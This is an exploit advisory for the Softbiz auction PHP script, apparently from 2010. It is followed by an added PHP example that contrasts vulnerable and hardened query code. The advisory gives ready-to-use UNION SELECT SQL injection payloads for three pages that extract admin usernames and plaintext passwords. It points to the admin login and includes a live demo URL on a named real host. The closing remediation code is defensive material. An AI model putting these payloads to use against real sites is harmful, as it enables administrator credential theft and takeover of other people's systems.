----------------------------Information------------------------------------------------
+Name : softbiz auktions script sql injection view_feedback.php
+Author : Easy Laster
+Date : 24.02.2010
+Script : softbiz auktions script
+Download : -----
+Demo : http://ezpips.com/
+Price : 99$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet, Underground Agents
+And all Friends of Cyberlive : R!p, Eddy14, Silent Vapor, Nolok, Kiba, -tmh-, Dr Chaos, HANN!BAL, Kabel, -=Player=-, Lidloses_Auge, N00bor, Damian.
---------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/view_feedback.php?id=
+Exploitable : www.site.com/auktionscript/view_feedback.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin#
The password is stored in plaintext; log in at www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------
+Demo : http://ezpips.com/view_feedback.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat%28admin_name,0x3a,pwd%29,12,13,14,15,16,17,18+from+sbauctions_admin#

----------------------------Information------------------------------------------------
+Name : softbiz auktions script sql injection view_items.php
+Author : Easy Laster
+Date : 24.02.2010
+Script : softbiz auktions script
+Download : -----
+Demo : http://ezpips.com/
+Price : 99$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
---------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/view_items.php?id=
+Exploitable : www.site.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin#
The password is stored in plaintext; log in at www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------

----------------------------Information------------------------------------------------
+Name : softbiz auktions script sql injection store_info.php
+Author : Easy Laster
+Date : 24.02.2010
+Script : softbiz auktions script
+Download : -----
+Demo : http://ezpips.com/
+Price : 99$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
---------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/store_info.php?id=
+Exploitable : www.site.com/auktionscript/store_info.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#
The password is stored in plaintext; log in at www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------
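As an added example that is not part of this advisory or of Softbiz's code: a hypothetical PHP handler showing the pattern all three advisories describe (an unvalidated id parameter concatenated into the query, so a null+union+select payload rewrites the statement) next to a hardened version, plus hashing of the admin password that the advisory notes is stored in plaintext. The table name sbauctions_feedback and all function names are assumptions; sbauctions_admin, admin_name and pwd are taken from the advisory.

```php
<?php
// Added example, not the script's own code. Hypothetical handler for view_feedback.php.

// Vulnerable pattern (assumed): the raw id is spliced into the SQL text, so
// id=null+union+select+... turns one row lookup into a read of any table.
function vulnerable_lookup(mysqli $db, array $get): ?array
{
    $id  = $get['id'] ?? '';                                      // untrusted, unvalidated
    $sql = "SELECT * FROM sbauctions_feedback WHERE id = $id";    // table name is an assumption
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened form: require a positive integer, then bind it as a parameter so the
// value is sent to MySQL as data and can never become part of the statement.
function safe_lookup(mysqli $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);        // "null union select ..." is rejected before any query
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM sbauctions_feedback WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The advisory notes sbauctions_admin.pwd holds the password in plaintext.
// Hashing it at rest means a read of that column no longer yields a usable login.
// Assumption: the pwd column is wide enough for a bcrypt hash (60+ characters).
function store_admin_password(mysqli $db, string $adminName, string $password): void
{
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE sbauctions_admin SET pwd = ? WHERE admin_name = ?');
    $stmt->bind_param('ss', $hash, $adminName);
    $stmt->execute();
    $stmt->close();
}

// Login check against the stored hash instead of a plaintext string comparison.
function check_admin_password(string $submitted, string $storedHash): bool
{
    return password_verify($submitted, $storedHash);
}
```

The same id validation and parameter binding applies unchanged to view_items.php and store_info.php, which the advisory reports with the identical injection point.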